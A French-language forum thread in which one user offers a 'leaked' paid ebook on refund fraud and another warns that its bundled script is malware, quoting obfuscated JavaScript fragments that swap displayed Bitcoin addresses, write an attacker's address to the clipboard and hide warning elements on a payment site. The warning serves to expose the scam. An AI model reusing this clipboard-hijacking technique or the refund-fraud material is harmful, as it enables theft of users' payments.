Formation 💲💲[LEAK] Ebook Refund 2025 💲💲

[MrDamocles]

Salut le peuple, 🫡
Je vous leak ce e-book choppée a 200€ (c'est super excessif pour un E-book je vous l'accorde c'est pour ça que je le leak) la derniére MAJ date d'hier donc 15/06/2025 y'a également l'a démonstration a la toute fin.

 

[tchangu]

pas mal mais quelqu'un a test ?

 

[Chris223]

/NE PAS UTILISER LE EBOOK/ Le script est clairement malveillant. Merci de ban @MrDamocles

1. Il remplace une adresse affichée sur le site https://app.triple-a.io par une adresse Bitcoin prédéfinie :
   js
   CopierModifier
   const _0x4f0fe3 = 'bc1qrkvt93qz5enrkweqh4anx00e82pvqcay8jh2cq';
   Cela signifie que l’utilisateur pense copier ou payer une adresse valide, mais il envoie en réalité ses fonds vers celle du créateur du script.
2. Il modifie le texte affiché dans un élément contenant une adresse BTC :
   js
   CopierModifier
   _0xe41093.innerText = _0x4f0fe3;
3. Il surveille la page constamment (avec MutationObserver et des setInterval) pour s’assurer que l’adresse affichée soit bien remplacée même en cas de rechargement ou de changement dynamique de l'interface.
4. Il intercepte les clics sur l'icône de copie d'adresse et place l'adresse de l'attaquant dans le presse-papiers :
   js
   CopierModifier
   navigator.clipboard.writeText(_0x4f0fe3);
5. Il supprime des éléments d’alerte potentiels :
   js
   CopierModifier
   document.querySelectorAll('[data-test-id="alert-wrapper-WARNING"]').forEach(...);
   Cela peut être utilisé pour masquer les avertissements de sécurité ou les erreurs affichées à l’utilisateur.

---

Il agit comme un "Clipboard Hijacker" + "DOM injection", destiné à :

• Rediriger les paiements de l’utilisateur vers l’adresse BTC d’un tiers.
• Tromper visuellement l’utilisateur en remplaçant les adresses affichées.
• Cacher les signes qui pourraient alerter l'utilisateur.